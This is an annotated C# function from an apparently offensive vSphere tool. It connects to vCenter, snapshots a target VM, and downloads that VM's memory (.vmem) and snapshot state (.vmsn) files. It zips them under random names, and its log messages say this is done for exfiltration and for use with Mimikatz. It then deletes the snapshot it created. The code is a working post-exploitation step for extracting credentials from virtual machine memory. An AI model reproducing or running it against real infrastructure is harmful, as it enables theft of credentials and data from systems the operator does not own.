示例#1
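        /// <summary>
        /// Finds the most recently modified file returned by a datastore search of the
        /// target VM's snapshot directory, downloads it and its .vmsn companion from the
        /// datastore's /folder endpoint, and packs both into one archive under
        /// <c>options.destination</c>.
        /// </summary>
        /// <param name="options">
        /// Supplies the endpoint URL, username and password, the target VM name, the
        /// snapshot flag and the local destination directory.
        /// </param>
        /// <returns>
        /// Always 0. Every failure is handed to <c>Error</c>; whether <c>Error</c>
        /// terminates the process is not visible in this block.
        /// </returns>
        /// <remarks>
        /// Side effects that the code below establishes:
        /// on the vSphere side, one SearchDatastore_Task, two authenticated downloads from
        /// <c>{host}/folder/...?dcPath=...&amp;dsName=...</c>, and a RemoveSnapshot_Task when
        /// <c>options.snapshot</c> is set; on the local side, three randomly named files in
        /// the destination directory, of which the two raw downloads are deleted after
        /// zipping and the archive is left in place.
        /// NOTE(review): a snapshot is only removed on the success path; any failure after
        /// GetSnapshot leaves it on the VM.
        /// </remarks>
        static int Dump(DumpOptions options)
        {
            try
            {
                // Authenticate to the endpoint; the same credentials are reused for the file downloads below.
                Connect(options.url, options.username, options.password, null);

                // Resolve the VM by name. Stop here on failure instead of dereferencing a null reference later.
                vm = GetTargetVM(options.targetvm);
                if (vm is null)
                {
                    Error(new Exception("Failed to find target VM " + options.targetvm + ", are you sure the name is right?"));
                    return 0; // only reached if Error returns
                }

                // Presumably creates a snapshot when options.snapshot is set and otherwise looks up an
                // existing one (GetSnapshot is defined elsewhere) - confirm against its implementation.
                ManagedObjectReference snapshot = GetSnapshot(options.targetvm, options.snapshot);

                // File layout of the snapshot's configuration; snapshotDirectory drives the search below.
                VirtualMachineFileInfo fileInfo = GetProperty<VirtualMachineConfigInfo>(snapshot, "config").files;

                // Walk vm -> environmentBrowser -> datastoreBrowser to reach the object that can search the datastore.
                ManagedObjectReference environmentBrowser = GetProperty<ManagedObjectReference>(vm, "environmentBrowser");
                ManagedObjectReference datastoreBrowser = GetProperty<ManagedObjectReference>(environmentBrowser, "datastoreBrowser");

                // Start the search and poll its task once per second until it reaches a terminal state.
                ManagedObjectReference task = vim.SearchDatastore_Task(datastoreBrowser, fileInfo.snapshotDirectory, GetHostDatastoreBrowserSearchSpec());
                string state = GetProperty<TaskInfo>(task, "info").state.ToString();
                while (state != "success")
                {
                    if (state == "error")
                    {
                        Error(new Exception("Error searching datastore for snapshot files"));
                        return 0; // a failed task never becomes "success"; do not keep polling
                    }

                    // Sleep for "running" and for any other non-terminal state (e.g. queued) so the
                    // loop never re-queries the server without a delay.
                    Thread.Sleep(1000);
                    state = GetProperty<TaskInfo>(task, "info").state.ToString();
                }
                HostDatastoreBrowserSearchResults results = (HostDatastoreBrowserSearchResults)GetProperty<TaskInfo>(task, "info").result;

                // No memory file may exist when the snapshot was taken without memory; treat a missing
                // result array the same as an empty one.
                FileInfo latestFile = null;
                if (results?.file == null || results.file.Length == 0)
                {
                    Error(new Exception("Failed to find any .vmem files associated with the VM, despite there being snapshots. Virtual machine memory may not have been captured. Recommend rerunning with --snapshot"));
                    return 0; // only reached if Error returns
                }

                // Keep the entry with the newest modification time.
                foreach (FileInfo file in results.file)
                {
                    if (latestFile == null || DateTime.Compare(file.modification, latestFile.modification) > 0)
                    {
                        latestFile = file;
                    }
                }

                // Build the datastore download URLs.
                // NOTE(review): Remove(Length - 4) assumes options.url ends in a 4-character suffix
                // (presumably "/sdk"); a shorter value throws and lands in the catch below.
                // NOTE(review): path and query values are concatenated without URL encoding, so names
                // containing characters such as '&' or '#' will produce a malformed request.
                string host = options.url.Remove(options.url.Length - 4);
                string dsName = FindTextBetween(results.folderPath, "[", "]");
                string folderPath = results.folderPath.Remove(0, dsName.Length + 3); // drops "[dsName] "
                string query = "?dcPath=" + datacenterName + "&dsName=" + dsName;
                string vmsnName = latestFile.path.Replace(".vmem", ".vmsn");
                string vmemURL = host + "/folder/" + folderPath + latestFile.path + query;
                string vmsnURL = host + "/folder/" + folderPath + vmsnName + query;

                // Local output paths: random names, no extension that identifies the content.
                string destination = options.destination.Replace("\"", string.Empty);
                string vmemFile = destination + @"\" + Path.GetRandomFileName();
                string vmsnFile = destination + @"\" + Path.GetRandomFileName();
                string zipFile = destination + @"\" + Path.GetRandomFileName();

                // Download both files with the session's username/password attached to each request.
                // NOTE(review): if options.url is not https these credentials may travel unprotected - confirm.
                using (var client = new System.Net.WebClient())
                {
                    client.Credentials = new System.Net.NetworkCredential(options.username, options.password);
                    client.Headers.Set(System.Net.HttpRequestHeader.ContentType, "application/octet-stream");
                    client.CachePolicy = new HttpRequestCachePolicy(HttpRequestCacheLevel.NoCacheNoStore);
                    Log("[x] Downloading " + latestFile.path + " (" + latestFile.fileSize / 1048576 + @"MB) to " + vmemFile + "...");
                    client.DownloadFile(vmemURL, vmemFile);

                    Log("[x] Downloading " + vmsnName + " to " + vmsnFile + "...");
                    client.DownloadFile(vmsnURL, vmsnFile);
                }

                // Pack both downloads into one archive. The using block releases the archive handle
                // even when adding an entry throws, which the previous explicit Dispose() call did not.
                Log("[x] Download complete, zipping up so it's easier to exfiltrate...");
                using (var zip = ZipFile.Open(zipFile, ZipArchiveMode.Create))
                {
                    zip.CreateEntryFromFile(vmemFile, Path.GetFileName(vmemFile), CompressionLevel.Optimal);
                    zip.CreateEntryFromFile(vmsnFile, Path.GetFileName(vmsnFile), CompressionLevel.Optimal);
                }
                File.Delete(vmemFile);
                File.Delete(vmsnFile);
                System.IO.FileInfo zipFileInfo = new System.IO.FileInfo(zipFile);
                Log("[x] Zipping complete, download " + zipFile + " (" + zipFileInfo.Length / 1048576 + "MB), rename to .zip, and follow instructions to use with Mimikatz");

                // Remove the snapshot only when this run asked for one to be created.
                if (options.snapshot)
                {
                    Log("[x] Deleting the snapshot we created");
                    // Arguments presumably map to removeChildren: false, consolidate: true - confirm against the generated proxy.
                    vim.RemoveSnapshot_Task(snapshot, false, true);
                }
            }
            catch (Exception fault)
            {
                // Every exception from the steps above is reported through the shared Error helper.
                Error(fault);
            }
            return 0;
        }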